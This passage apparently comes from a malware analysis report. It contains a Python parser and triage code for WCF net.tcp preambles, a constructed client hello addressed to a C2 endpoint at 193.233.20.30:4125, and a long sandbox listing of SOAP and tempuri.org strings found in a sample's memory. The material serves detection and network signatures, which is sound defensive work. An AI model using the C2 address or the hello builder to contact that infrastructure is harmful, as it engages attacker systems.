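            n, pos = _read_size(buf, pos)
            text = buf[pos:pos + n].decode("utf-8")
            pos += n
            out["via" if rec == VIA_RECORD else "upgrade"] = text
        elif rec == PREAMBLE_END_RECORD:
            return out
        else:
            raise ValueError(f"unexpected record 0x{rec:02x} at offset {pos - 1}")
    raise ValueError("preamble truncated before PreambleEnd")


def triage_via(via):
    """Reasons a Via URI looks like the traffic in this report rather than a
    normal WCF service endpoint."""
    parts = urlsplit(via)
    reasons = []
    if parts.scheme != "net.tcp":
        reasons.append(f"scheme {parts.scheme!r} is not net.tcp")
    try:
        ipaddress.ip_address(parts.hostname or "")
        reasons.append("host is a bare IP literal")
    except ValueError:
        pass
    if parts.port is not None and parts.port != NET_TCP_DEFAULT_PORT:
        reasons.append(f"port {parts.port} is not the net.tcp default ({NET_TCP_DEFAULT_PORT})")
    return reasons


def build_client_preamble(via, mode=0x02, encoding=0x08):
    """Client side of the exchange; the server answers with a single 0x0B byte."""
    via_b = via.encode("utf-8")
    return (bytes([VERSION_RECORD, 0x01, 0x00, MODE_RECORD, mode, VIA_RECORD])
            + _encode_size(len(via_b)) + via_b
            + bytes([KNOWN_ENCODING_RECORD, encoding, PREAMBLE_END_RECORD]))


SERVER_PREAMBLE_ACK = bytes([PREAMBLE_ACK_RECORD])

# Constructed client hello for the C2 endpoint from the extracted configuration.
SAMPLE_CLIENT_HELLO = build_client_preamble("net.tcp://193.233.20.30:4125/")

if __name__ == "__main__":
    info = parse_preamble(SAMPLE_CLIENT_HELLO)
    print(info, triage_via(info["via"]))
```

Because the Via record is sent before any upgrade, the same parser works on the first client segment of a capture even when the rest of the session is encrypted, which is also why a network signature can key on it.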
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D#
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
